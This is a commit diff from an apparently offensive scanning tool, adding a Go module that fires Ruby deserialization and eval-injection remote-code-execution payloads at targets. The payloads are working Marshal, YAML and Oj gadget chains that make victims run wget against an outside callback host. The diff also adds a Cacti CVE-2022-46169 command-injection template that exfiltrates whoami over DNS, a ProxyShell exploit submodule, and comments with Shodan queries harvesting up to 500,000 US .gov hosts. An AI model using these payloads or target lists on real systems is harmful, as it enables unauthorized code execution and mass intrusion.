add pocs_go/ruby/chkRuby 2023-01-15

Author: hktalent

.github/workflows/build.yml

@@ -43,19 +43,20 @@ jobs:
           fetch-depth: 0
       - name: Checkout submodules
         run: git submodule update --init --recursive
-      - name: Install cross-compiler for linux/arm64
-        run: sudo apt-get -y install gcc-aarch64-linux-gnu
+#      - name: Install cross-compiler for linux/arm64
+#        run: sudo apt-get -y install gcc-aarch64-linux-gnu
       - name: Set up Go
         uses: actions/setup-go@v2
         with:
           go-version: 1.18
       - name: Install Dependences
         run: |
           sudo apt-get update
-          sudo apt-get -y install gcc-mingw-w64-x86-64
-          sudo apt-get -y install gcc-arm-linux-gnueabihf libc6-dev-armhf-cross
-          sudo apt-get -y install gcc-aarch64-linux-gnu libc6-dev-arm64-cross
-          sudo apt install -yy libpcap-dev upx gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
+#          sudo apt-get -y install gcc-mingw-w64-x86-64
+#          sudo apt-get -y install gcc-arm-linux-gnueabihf libc6-dev-armhf-cross
+#          sudo apt-get -y install gcc-aarch64-linux-gnu libc6-dev-arm64-cross
+          sudo apt install -yy libpcap-dev
+#          sudo apt install upx gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
           chmod +x .github/workflows/upx.sh
 #          git submodule update --init --recursive --remote
       - name: Run GoReleaser

.gitmodules

@@ -7,3 +7,6 @@
 [submodule "config/fuzzing-templates"]
 	path = config/fuzzing-templates
 	url = https://github.com/projectdiscovery/fuzzing-templates.git
+[submodule "tools/ProxyShell"]
+	path = tools/ProxyShell
+	url = https://github.com/ktecv2000/ProxyShell.git

README.md

@@ -211,7 +211,7 @@ more see: <a href=https://github.com/hktalent/ProScan4all/discussions>discussion
 - 2022-06-07 增加http url列表精准扫描参数，根据环境变量UrlPrecise=true开启
 
 # Communication group (WeChat, QQ，Tg)
-| Wechat                                                                            | Or                                                                                | QQchat                                                                       | Or | Tg |
+|Wechat|Or|QQchat|Or|Tg|
 |---|---|---|--- |--- |
 | <img width=166 src=https://github.com/hktalent/scan4all/blob/main/static/wcq.JPG> || <img width=166 src=https://github.com/hktalent/scan4all/blob/main/static/qqc.jpg> || <img width=166 src=https://github.com/hktalent/sall/blob/main/static/tg.jpg> |
 

brute/dicts/filedic.txt

@@ -122,6 +122,7 @@
 /components/com_users/views/login/tmpl/index.html
 /components/com_users/views/login/view.html.php
 /confluence/login.vm
+/old/wp-admin/setup-config.php
 /console/login/LoginForm.jsp
 /doc/page/login.asp
 /downloader/template/login.phtml

config/51pwn/CVE-2022-46169.yaml

@@ -0,0 +1,27 @@
+id: CVE-2022-46169_51pwn
+
+info:
+  name: Unauthenticated Command Injection
+  author: 51pwn
+  severity: critical
+  description: |
+    The vulnerability resides in the remote_agent.php file. This file can be accessed without authentication. In order to verify that the client is allowed the function remote_client_authorized is called:
+
+
+requests:
+  - raw:
+      - |
+        GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
+        Accept-Charset: utf-8
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        X-Forwarded-For: 127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '[{"value": "'
+        condition: and

config/config.json

@@ -59,6 +59,7 @@
       "-pc","{PWD}/config/uncover/provider-config.yaml",
       "-config","{PWD}/config/uncover/config.yaml",
       "-f","ip,port,host",
+      "-l","900000",
       "-shodan",
       "-silent","-nc","-json","-o",""
     ],

tools/cve/main.go renamed to cveMain.go

@@ -1,6 +1,8 @@
 package main
 
 import (
+	"embed"
+	_ "github.com/hktalent/ProScan4all/engine"
 	"github.com/hktalent/ProScan4all/lib/util"
 	"github.com/hktalent/ProScan4all/pocs_go"
 	"github.com/hktalent/ProScan4all/pocs_go/Springboot"
@@ -17,6 +19,7 @@ import (
 	"github.com/hktalent/ProScan4all/pocs_go/mcms"
 	"github.com/hktalent/ProScan4all/pocs_go/ms"
 	"github.com/hktalent/ProScan4all/pocs_go/phpunit"
+	"github.com/hktalent/ProScan4all/pocs_go/ruby"
 	"github.com/hktalent/ProScan4all/pocs_go/seeyon"
 	"github.com/hktalent/ProScan4all/pocs_go/spark"
 	"github.com/hktalent/ProScan4all/pocs_go/sunlogin"
@@ -25,13 +28,18 @@ import (
 	"github.com/hktalent/ProScan4all/pocs_go/weblogic"
 	"github.com/hktalent/ProScan4all/pocs_go/zabbix"
 	"github.com/hktalent/ProScan4all/pocs_go/zentao"
+	"log"
 	"os"
 )
 
+//go:embed config/*
+var Config embed.FS
+
 // 多个web cve 检测
 func main() {
-	util.DoInit(nil)
+	util.DoInit(&Config)
 	for _, cbk := range []func(string) bool{
+		ruby.DoCheck,
 		apache.CVE_2020_13935Noe,
 		confluence.CVE_2021_26084,
 		confluence.CVE_2022_26134,
@@ -89,7 +97,12 @@ func main() {
 		weblogic.CVE_2021_2109,
 	} {
 		cbk1 := cbk
-		util.DoSyncFunc(func() {
+		util.DefaultPool.Submit(func() {
+			defer func() {
+				if o := recover(); nil != o {
+					log.Println(o)
+				}
+			}()
 			cbk1(os.Args[1])
 		})
 	}

pkg/xcmd/allCmdTools.go

@@ -303,8 +303,12 @@ func DoRaw4FuzzCmd(s, t string) string {
 }
 
 /*
+ssl:".edu" country:"US"
+
 	./uncover -q 'ssl:"paypal.com"'  -e shodan -pc ../../config/uncover/provider-config.yaml  -config ../../config/uncover/config.yaml -f ip,port,host -json -o paypal1.json
 
+./uncover -q 'ssl:".gov" country:"US"' -l 500000  -e shodan -pc ../../config/uncover/provider-config.yaml  -config ../../config/uncover/config.yaml -f ip,port,host -json -o edu.json
+
 'ssl:"China Lodging Group"'
 'ssl:"huazhu"'
 'ssl:"huazhu.com"'

pocs_go/ruby/chkRuby.go

@@ -0,0 +1,246 @@
+package ruby
+
+import (
+	"encoding/hex"
+	"fmt"
+	"github.com/hktalent/ProScan4all/lib/util"
+	"io"
+	"log"
+	"net/url"
+	"strings"
+	"sync"
+)
+
+/*
+https://bishopfox.com/blog
+*/
+func DoCheck(u string) bool {
+	bRst := false
+	if oH, err := url.Parse(u); nil == err {
+		szU := fmt.Sprintf("%s://%s/", oH.Scheme, oH.Host)
+		szId := hex.EncodeToString([]byte(szU))
+		aCmd := []string{"wget https://rce.51pwn.com/rceCheck?c=" + szId + "&vulId=%d_"}
+		var wg sync.WaitGroup
+		for n, c := range aCmd {
+			c = fmt.Sprintf(c, n)
+			//szC := url.QueryEscape(c)
+			aPay := []string{
+				"?url=|" + url.QueryEscape(c+"1"),
+				"?send_method_name=eval&send_argument=`" + url.QueryEscape(c+"2") + "`",
+				"?send_value[]=eval&send_value[]=`" + url.QueryEscape(c+"3") + "`",
+				"?public_send_method_name=instance_eval&public_send_argument=`" + url.QueryEscape(c+"4") + "`",
+				"?public_send_value[]=instance_eval&public_send_value[]=`" + url.QueryEscape(c+"5") + "`",
+				"?base64binary=" + url.QueryEscape(util.Base64Encode(`..{.:.payload[.c.Gem::SpecFetcherc.Gem::InstallerU:.Gem::Requirement[.o:.Gem::Package::TarReader.:.@ioo:.Net::BufferedIO.;.o:#Gem::Package::TarReader::Entry.:
+@readi.:.@headerI".aaa.:.ET:.@debug_outputo:.Net::WriteAdapter.:.@socketo:.Gem::RequestSet.:
+@setso;..;.m.Kernel:.@method_id:.system:
+@git_setI".`+c+`6.;
+T;.:.resolve`)),
+				"?base64binary=" + url.QueryEscape(util.Base64Encode(`..U:,ActiveRecord::Associations::Association[.o:.Gem::Installer.o:.Gem::Package::TarReader.:.@ioo:.Net::BufferedIO.;.o:#Gem::Package::TarReader::Entry.:
+@readi.:.@headerI"	bbbb.:.ET:.@debug_outputo:.Logger.:.@logdevo:.Rack::Response.:.@bufferedF:
+@bodyo:.Set.:
+@hash}.o:.Gem::Security::Policy.:
+@name{	:
+filenameI"./tmp/xyz.txt.;
+T:.environmento:&Rails::Initializable::Initializer.:
+@contexto:.Sprockets::Context.:	dataI"A<%= system('`+c+`7') %>.;
+T:
+metadata{.TF:.@writero:.Sprockets::ERBProcessor.`)),
+			}
+			for _, x1 := range aPay {
+				wg.Add(1)
+				go func(s string) {
+					defer wg.Done()
+					if resp, err := util.DoGet(s, map[string]string{}); nil == err && nil != resp {
+
+					}
+				}(szU + x1)
+			}
+
+			var aPost = []string{`:payload:
+- !ruby/class 'Gem::SpecFetcher'
+- !ruby/class 'Gem::Installer'
+- !ruby/object:Gem::Requirement
+  requirements: !ruby/object:Gem::Package::TarReader
+    io: !ruby/object:Net::BufferedIO
+      io: !ruby/object:Gem::Package::TarReader::Entry
+        read: 0
+        header: aaa
+      debug_output: !ruby/object:Net::WriteAdapter
+        socket: !ruby/object:Gem::RequestSet
+          sets: !ruby/object:Net::WriteAdapter
+            socket: !ruby/module 'Kernel'
+            method_id: :system
+          git_set: ` + c + `8
+        method_id: :resolve`,
+				`---
+:payload:
+- !ruby/object:Gem::SpecFetcher {}
+- !ruby/object:Gem::Installer {}
+- ? !ruby/object:Gem::Requirement
+    requirements: !ruby/object:Gem::Package::TarReader
+      io: !ruby/object:Net::BufferedIO
+        io: !ruby/object:Gem::Package::TarReader::Entry
+          read: 2
+          header: bbbb
+        debug_output: !ruby/object:Logger
+          logdev: !ruby/object:Rack::Response
+            buffered: false
+            body: !ruby/object:Set
+              hash:
+                ? !ruby/object:Gem::Security::Policy
+                  name:
+                    :filename: "/tmp/xyz.txt"
+                    :environment: !ruby/object:Rails::Initializable::Initializer
+                      context: !ruby/object:Sprockets::Context {}
+                    :data: "<%= os_command = '` + c + `9'; system(os_command); %>"
+                    :metadata: {}
+                : true
+            writer: !ruby/object:Sprockets::ERBProcessor {}
+  : dummy_value`,
+			}
+			// Content-Type: application/json
+			var m1 = map[string]interface{}{}
+			for i, w := range aPost {
+				m1["yaml"] = w
+				if data, err := util.Json.Marshal(&m1); nil == err {
+					aPost[i] = string(data)
+				}
+			}
+			aPost = append(aPost, `[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"aaa"},"debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":system"},"git_set":"`+c+`10"},"method_id":":resolve"}}}}]`)
+
+			// oj
+			aPost = []string{`{
+  "^#1": [
+    [
+      {
+        "^c": "Gem::SpecFetcher"
+      },
+      {
+        "^c": "Gem::Installer"
+      },
+      {
+        "^o": "Gem::Requirement",
+        "requirements": {
+          "^o": "Gem::Package::TarReader",
+          "io": {
+            "^o": "Net::BufferedIO",
+            "io": {
+              "^o": "Gem::Package::TarReader::Entry",
+              "read": 0,
+              "header": "aaa"
+            },
+            "debug_output": {
+              "^o": "Net::WriteAdapter",
+              "socket": {
+                "^o": "Gem::RequestSet",
+                "sets": {
+                  "^o": "Net::WriteAdapter",
+                  "socket": {
+                    "^c": "Kernel"
+                  },
+                  "method_id": ":system"
+                },
+                "git_set": "` + c + `11"
+              },
+              "method_id": ":resolve"
+            }
+          }
+        }
+      }
+    ],
+    "dummy_value"
+  ]
+}`, `{
+  "^#1": [
+    [
+      {
+        "^c": "Gem::SpecFetcher"
+      },
+      {
+        "^o": "Gem::Installer"
+      },
+      {
+        "^o": "Gem::Requirement",
+        "requirements": {
+          "^o": "Gem::Package::TarReader",
+          "io": {
+            "^o": "Net::BufferedIO",
+            "io": {
+              "^o": "Gem::Package::TarReader::Entry",
+              "read": 2,
+              "header": "bbbb"
+            },
+            "debug_output": {
+              "^o": "Logger",
+              "logdev": {
+                "^o": "Rack::Response",
+                "buffered": false,
+                "body": {
+                  "^o": "Set",
+                  "hash": {
+                    "^#2": [
+                      {
+                        "^o": "Gem::Security::Policy",
+                        "name": {
+                          ":filename": "/tmp/xyz.txt",
+                          ":environment": {
+                            "^o": "Rails::Initializable::Initializer",
+                            "context": {
+                              "^o": "Sprockets::Context"
+                            }
+                          },
+                          ":data": "<%= system('` + c + `12') %>",
+                          ":metadata": {}
+                        }
+                      },
+                      true
+                    ]
+                  }
+                },
+                "writer": {
+                  "^o": "Sprockets::ERBProcessor"
+                }
+              }
+            }
+          }
+        }
+      }
+    ],
+    "dummy_value"
+  ]
+}`}
+			delete(m1, "yaml")
+			for _, w := range aPost {
+				// dummy_value 是尝试注入的输入字段
+				m1["oj"] = w
+				if data, err := util.Json.Marshal(&m1); nil == err {
+					aPost = append(aPost, string(data))
+				}
+			}
+			for _, x := range aPost {
+				wg.Add(1)
+				go func(s string) {
+					defer wg.Done()
+					if resp, err := util.DoPost(szU, map[string]string{"Content-Type": "application/json"}, strings.NewReader(s)); nil == err && nil != resp {
+					}
+				}(x)
+			}
+		}
+		// 检测、确认结果
+		wg.Wait()
+		if resp, err := util.DoGet("https://rce.51pwn.com/rceCheck?q="+szId, map[string]string{}); nil == err && nil != resp {
+			var a = []map[string]string{}
+			if data, err := io.ReadAll(resp.Body); nil == err {
+				if nil == util.Json.Unmarshal(data, &a) {
+					if 0 < len(a) {
+						log.Printf("fond vuls ruby %v\n", a)
+						bRst = true
+					}
+				}
+			}
+		}
+	} else {
+		log.Println(u, err)
+	}
+	return bRst
+}